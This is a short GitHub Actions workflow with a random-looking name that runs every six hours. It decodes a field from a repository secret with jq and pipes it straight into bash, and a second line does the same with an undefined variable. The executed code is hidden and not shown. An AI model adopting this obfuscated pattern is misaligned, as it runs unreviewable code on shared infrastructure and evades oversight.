name: shucixinazoa
on:
  workflow_dispatch:
  schedule:
    - cron: '34 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: shucixinazoa
        env:
          w7: ${{ secrets.w7 }}
        run: |
          echo $w7 | jq -r .i08988 | /bin/bash
          echo $i70 | jq -r .i4 | /bin/bash

